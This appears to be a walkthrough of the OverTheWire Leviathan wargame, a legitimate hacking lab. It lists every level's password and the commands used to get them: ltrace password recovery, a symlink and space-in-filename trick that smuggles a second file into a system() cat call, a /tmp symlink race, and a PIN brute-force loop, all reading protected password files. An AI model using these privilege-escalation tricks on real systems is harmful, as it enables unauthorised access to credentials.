Walk-through guide with examples for the OverTheWire Leviathan game
Needs: Web browser + puTTY
User/Pass: leviathan0
Connect: leviathan.labs.overthewire.org
Nota Bene: No hints are given (via website) for ANY of the levels in this game Data for the levels can be found in this game
No hints
cd .backup/
cat bookmarks.html | grep password
- Password: rio6egei8m
./check
asks for a password
Nota Bene: Look into the ltrace
command
ltrace ./check
- 1st - saw
strcmp()
between "pas" & "sex" - Assume first three chars of password is "sex"
Passing "sex" to ./check
causes new terminal to open
whoami
shows I am nowleviathan2
Now cat
the password
/etc/leviathan_pass/leviathan2
Pass: ougahZi8Ta
./printfile
- ***File Printer***
- Usage:
./printfile filename
`ltrace ./printfile /etc/leviathan_pass/leviathan2
- Shows calls to functions:
accesss()
snprintf()
system()
- Checks that we have access to the file being examined
- Uses
snprintf()
to copy the passed file name into a string
- "
/bin/cat %s
"
- Call the crafted "
/bin/cat %s
" command using thesystem()
function
Note: Can exploit snprintf()
to create a /bin/cat
system call to multiple files (e.g. file: file\ aswd
)
- Create
tmp
folder - Create a link to the desired password file
ln -s /etc/leviathan_pass/leviathan3 ./file
- Create touch file
touch file\asdf
makes file "file asdf" (exploit part)- Call
./printfile
on the created touch file (file\ asdf
)
The reason this works is that when the file file\ asdf
is cllaed by snprintf()
"file\ asdf
" becomes "file
" and "asdf
"
- This allows for passing the
access()
function while still reading the desired password file
Pass: Ahdiemoo1j
ltrace ./level3
- see
strcmp
againstsnlprintf
./level3
-> snlprintf
-> cat /etc/leviathan_pass/leviathan4
Pass: vuH0coox6m
cd ./trash
./bin
- returns sets of binary
Use binary to ascii converter
- Pass: Tith4cokei
./leviathan5
ln -s /etc/leviathan_pass/leviathan6 /tmp/file.out
- Pass: UgaoFee4li
./leviathan6
- Need 4 digit pin code
Brute force the pin
- Can do one-liner:
for i in {0000..9999}; do ./leviathan6 $i; echo $i; done
Get new shell
cat /etc/leviathan_pass/leviathan7
- Pass: ahy7MaeBo9